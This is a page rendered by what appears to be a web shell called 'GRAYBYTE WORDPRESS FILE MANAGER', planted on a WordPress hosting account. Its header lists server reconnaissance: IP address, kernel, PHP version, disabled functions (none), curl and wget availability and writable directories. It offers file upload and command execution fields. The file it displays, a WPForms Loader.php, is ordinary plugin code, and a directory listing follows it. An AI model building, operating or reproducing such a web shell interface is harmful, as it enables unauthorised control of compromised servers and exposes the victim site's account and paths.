GRAYBYTE WORDPRESS FILE MANAGER6672

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/wpforms/src/Admin/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/trustyourlawyer.com/wp-content/plugins/wpforms/src/Admin//Loader.php
<?php

namespace WPForms\Admin;

/**
 * Class Loader gives ability to track/load all admin modules.
 *
 * @since 1.5.0
 */
class Loader {

	/**
	 * Get the instance of a class and store it in itself.
	 *
	 * @since 1.5.0
	 */
	public static function get_instance() {

		static $instance;

		if ( ! $instance ) {
			$instance = new self();
		}

		return $instance;
	}

	/**
	 * Loader constructor.
	 *
	 * @since 1.5.0
	 */
	public function __construct() {

		$core_class_names = array(
			'Connect',
			'DashboardWidget',
			'Education',
			'FlyoutMenu',
			'Builder\Education',
			'Builder\LicenseAlert',
			'Pages\Community',
			'Pages\SMTP',
			'Pages\Analytics',
			'Settings\Education',
			'Entries\PrintPreview',
			'Entries\DefaultScreen',
		);

		$class_names = \apply_filters( 'wpforms_admin_classes_available', $core_class_names );

		foreach ( $class_names as $class_name ) {
			$this->register_class( $class_name );
		}
	}

	/**
	 * Register a new class.
	 *
	 * @since 1.5.0
	 *
	 * @param string $class_name Class name to register.
	 */
	public function register_class( $class_name ) {

		$class_name = \sanitize_text_field( $class_name );

		// Load Lite class if exists.
		if ( ! \wpforms()->pro && \class_exists( 'WPForms\Lite\Admin\\' . $class_name ) ) {
			$class_name = 'WPForms\Lite\Admin\\' . $class_name;
			new $class_name();
			return;
		}

		// Load Pro class if exists.
		if ( \wpforms()->pro && \class_exists( 'WPForms\Pro\Admin\\' . $class_name ) ) {
			$class_name = 'WPForms\Pro\Admin\\' . $class_name;
			new $class_name();
			return;
		}

		// Load general class if neither Pro nor Lite class exists.
		if ( \class_exists( __NAMESPACE__ . '\\' . $class_name ) ) {
			$class_name = __NAMESPACE__ . '\\' . $class_name;
			new $class_name();
		}
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:24
giriqfky / giriqfky
0755
Builder
--
July 10 2025 04:32:24
giriqfky / giriqfky
0755
Pages
--
July 10 2025 04:32:24
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:24
giriqfky / giriqfky
0644
AdminBarMenu.php
6.59 KB
February 29 2024 08:11:15
giriqfky / giriqfky
0644
Challenge.php
13.952 KB
February 29 2024 08:11:15
giriqfky / giriqfky
0644
FlyoutMenu.php
3.509 KB
February 29 2024 08:11:15
giriqfky / giriqfky
0644
FormEmbedWizard.php
6.438 KB
February 29 2024 08:11:15
giriqfky / giriqfky
0644
Loader.php
1.739 KB
February 29 2024 08:11:15
giriqfky / giriqfky
0644
Notifications.php
11.532 KB
February 29 2024 08:11:15
giriqfky / giriqfky
0644
SiteHealth.php
3.118 KB
February 29 2024 08:11:15
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF